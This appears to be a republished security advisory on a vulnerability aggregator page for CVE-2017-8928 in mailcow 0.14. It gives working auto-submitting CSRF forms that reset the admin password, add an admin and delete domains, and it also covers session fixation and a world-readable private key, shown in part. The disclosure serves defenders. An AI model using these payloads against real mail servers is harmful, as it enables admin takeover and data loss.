Mailcow 0.14 - Cross-Site Request Forgery Vulnerability

🗓️ 15 May 2017 00:00:00Reported by hyp3rlinxType

zdt🔗 0day.today👁 86 Views

mailcow 0.14 Cross-Site Request Forgery Vulnerability, allows admin password reset, add admin, delete domains. Vulnerabilities found in mailcow: CSRF, Session Fixation, World Readable Private key

Reporter	Title	Published	Views	Family All 10
CNVD	Mailcow Cross-Site Request Forgery Vulnerability (CNVD-2017-10371)	16 May 201700:00	–	cnvd
CVE	CVE-2017-8928	14 May 201722:00	–	cve
Cvelist	CVE-2017-8928	14 May 201722:00	–	cvelist
Exploit DB	Mailcow 0.14 - Cross-Site Request Forgery	15 May 201700:00	–	exploitdb
EUVD	EUVD-2017-17868	7 Oct 202500:30	–	euvd
exploitpack	Mailcow 0.14 - Cross-Site Request Forgery	15 May 201700:00	–	exploitpack
NVD	CVE-2017-8928	14 May 201722:29	–	nvd
OSV	CVE-2017-8928	14 May 201722:29	–	osv
Packet Storm	MailCow 0.14 Cross Site Request Forgery	14 May 201700:00	–	packetstorm
Prion	Cross site request forgery (csrf)	14 May 201722:29	–	prion

[+] Credits: John Page a.k.a hyp3rlinx  
 
 
Vendor:
=============
mailcow.email
mailcow.github.io
 
 
 
Product:
===========
The integrated mailcow UI allows administrative work on your mail server instance as well as separated domain administrator and mailbox user access.
 
 
 
Vulnerability Type:
===================
CSRF
Password Reset / Add Admin / Delete Domains
 
 
 
CVE Reference:
==============
CVE-2017-8928
 
 
 
Security Issue:
================
mailcow 0.14, as used in "mailcow: dockerized" and other products, has CSRF vulnerabilities. If authenticated mailcow user visits a malicious webpage
remote attackers can execute the following exploits.
 
 
1) reset admin password
2) add arbitrary admin
3) delete domains
 
 
 
Other issues found in mailcow are as follows:
 
Session fixation:
=================
Session ID: Pre authentication and Post auth is the same, and does not change upon successful login.
 
ms22jsnl1dcpc4519rvpvfj0n6 - pre-authentication
ms22jsnl1dcpc4519rvpvfj0n6 - post-authentication
 
 
World Readable Private key "key.pem"
====================================
[email protected]:/usr/local/mailcow-dockerized-master/data/assets/ssl$ whoami
 
john
 
[email protected]:/usr/local/mailcow-dockerized-master/data/assets/ssl$ cat key.pem 
 
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA0YNMU9wLfQ0m9x+TjKdytTKVwIGMqLUiuk0utXwtEBB8tnzF
4sLOwIHMnui5+whutxXtXjdo5HZXn8vcSYr0vMucNDPItevL+c58wvH58pS9ojok
mHyvwf6BKn1O2B+EXHoDud6AwyFGZouBa4J7u9/VVTlNWchxFahidh9mgCJKGUYx
s7pg/WJuC1honbSicwYBbf6poVHll4qTPMNvNV5EJyVO/fsdssJyUrxGd6/2VSQu
5G44lcPv5NeZPQsZOiJPMJidF//sVsaGaJh0CNSzNFSgEv4mlPeXZ9m6Zby+o04o
slgG6zI0irOF2z7f3yGzonDZI+vghctDFX8shwIDAQABAoIBAQC9kiLnIgxXGyZt
pmmYdA6re1jatZ2zLSp+DcY8ul3/0hs195IKCyCOOSQPiR520Pt0t+duP46uYZIJ
 
etc...
 
 
References:
============
https://github.com/mailcow/mailcow-dockerized/pull/268/commits/3c937f75ba5853ada175542d5c4849fb95eb64cd
 
 
 
Exploit/POC:
=============
 
[Admin Password Reset]
 
<form action="https://localhost/admin.php" method="post">
<input type="hidden" name="admin_user_now" value="admin">
<input type="hidden" name="admin_user" value="admin">
<input type="hidden" name="admin_pass" value="Abc12345">
<input type="hidden" name="admin_pass2" value="Abc12345">
<input type="hidden" name="trigger_set_admin" value="">
<script>document.forms[0].submit()</script>
</form>
 
 
HTTP Response:
 
'Changes to administrator have been saved"
 
//////////////////////
 
 
[Add Admin]
 
<form action="https://localhost/admin.php" method="post">
<input type="hidden" name="username" value="HELL">
<input type="hidden" name="password" value="Abc12345">
<input type="hidden" name="password2" value="Abc12345">
<input type="hidden" name="active" value="on">
<input type="hidden" name="trigger_add_domain_admin" value="localhost">
<script>document.forms[0].submit()</script>
</form>
 
 
////////////////////
 
 
[Delete domains]
 
https://localhost/mailbox.php
domain=myDomain&trigger_mailbox_action=deletedomain

#  0day.today [2018-01-08]  #

15 May 2017 00:00Current

8.7High risk

Vulners AI Score8.7

EPSS0.00288